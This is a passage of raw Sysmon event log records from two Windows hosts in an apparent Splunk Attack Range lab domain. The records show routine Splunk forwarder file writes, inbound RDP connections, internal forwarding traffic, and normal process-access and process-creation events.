Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=996A0C2150EE36ADD4D4866A1084CC1C,SHA256=7327976E220702FB42C55B9679BF36FB7B9DE5E67F921665C7C1B05FF6EB5E0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:37.936{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64460- 354300x80000000000000001049109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:37.711{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52562-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:39.659{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E0B2B34496AE32BF1C49DFBD4FA90F,SHA256=54574A880CEBF8A46671F75446FB1C204F84D3981E42B0F4B9512CE3A9203C5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:39.283{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD801088B11B5B19D11692A89422C5F,SHA256=2CBD3C3ADAC490CD73F2B681F32D7E6B4AD0E4C82FA7420143DB8FF6AE8CAF58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:39.238{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A5B0007F78715CA51C089F5567C15B7A,SHA256=DF91845C65FE38D3F7D81C1A7A6AF9FB59EF64356C21C7E284FECCDB2EE54C67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:39.075{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E530C1ABC4457B7597B2600310183F38,SHA256=6CB8B594D40AE8D747FBA5AABD388C6690033EF9240EC267E94AB4099788951D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:39.075{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4F6EB7A1C0A2D608BF4559D5043D797,SHA256=22961EDC623CA8E1863C7D0081D023E83EC0DFFF6675C228441766532B13C187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:40.673{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=886DBCDB9F475FB1E99B13B4788B8B50,SHA256=482216900DE3DD7961513A681280433D10B3998A7116B3E3D8749032F565218F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:40.283{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BE83605ECBCDAEAD09E3B7F88B56682,SHA256=75EAE4366ED5CA0FA42A48AD9BEF512343A39E1E0C7562C3B95E8B41A7996B07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:40.252{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A4049463B9AA4D04833F0F8405E7221,SHA256=F2386A47A3B21E8C39BFE58ACB751DD96D1F4918139F6C42F915833904C3290E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:41.688{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E06F63327BDC13BA71DFE7BD7C53B959,SHA256=0E9E0AB26F380A1D51472C6C0001E455C0B75A0277C458DC0A7FB041DB05AF20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:41.299{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB9BD7D36AC783993FDC7162D3FFEFA1,SHA256=293B62E7764E8BEBA4DEE8F87DE499AA56C38A5315601FB513475EBE16CAEFD6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.549{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54976-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001049114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:42.757{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=318BCFEF78F473159330895485F42F97,SHA256=80755E3A3321E2475B3D5E441E227D95D36BE9660498D7FD5B927CF2CA64828D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:37.896{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59320-false10.0.1.12-8000- 23542300x8000000000000000977796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:42.314{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA63D0CFFEBA945B812F1947078875D,SHA256=89D0FAB16FBFEDA8C6C7CB3F3E20ED065D512D1B5CF19C11A5B00B70A34E28B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:39.787{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de50411-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:43.757{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C513B42936914EE187B1801AB4D993,SHA256=8A88F2B82AFBA931283C10ECE02B2BD971A9F6D95BC0000A290322BBCA8285B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:43.318{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7266DC0499DD9ECE6F6712CB01EB7CE0,SHA256=316554A8E26174603537987831DBDD406D4C043D8A8C2FD9B8F0881FB025AA82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:43.172{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E530C1ABC4457B7597B2600310183F38,SHA256=6CB8B594D40AE8D747FBA5AABD388C6690033EF9240EC267E94AB4099788951D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.802{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DEBFD85BB7A085D9F640A196664AAD8,SHA256=D2112CD4AE328D18C41F2F95C081518D970AEE6E905D7F13A28FB3D0258C406B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:44.333{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C305E8860C0454BEB808F10BE7B25EF,SHA256=C90551BAB6623B3E4C26007A82955BB50B1433798A75895877ACA047DD07E786,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89A4-6151-0F7A-00000000FC01}6348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89A4-6151-0F7A-00000000FC01}6348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.603{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89A4-6151-0F7A-00000000FC01}6348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.588{5EBD8912-89A4-6151-0F7A-00000000FC01}6348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:42.364{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55520-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:41.879{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53287-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:44.303{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8414EB1DE08228D38B9A3EAA34EF9F71,SHA256=D236BF47BB0D8A15421F95CF6EA1B753ED3E89B29F93C73F4F92C1AC91179A4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-89A5-6151-117A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-89A5-6151-117A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:45.834{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-89A5-6151-117A-00000000FC01}4112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 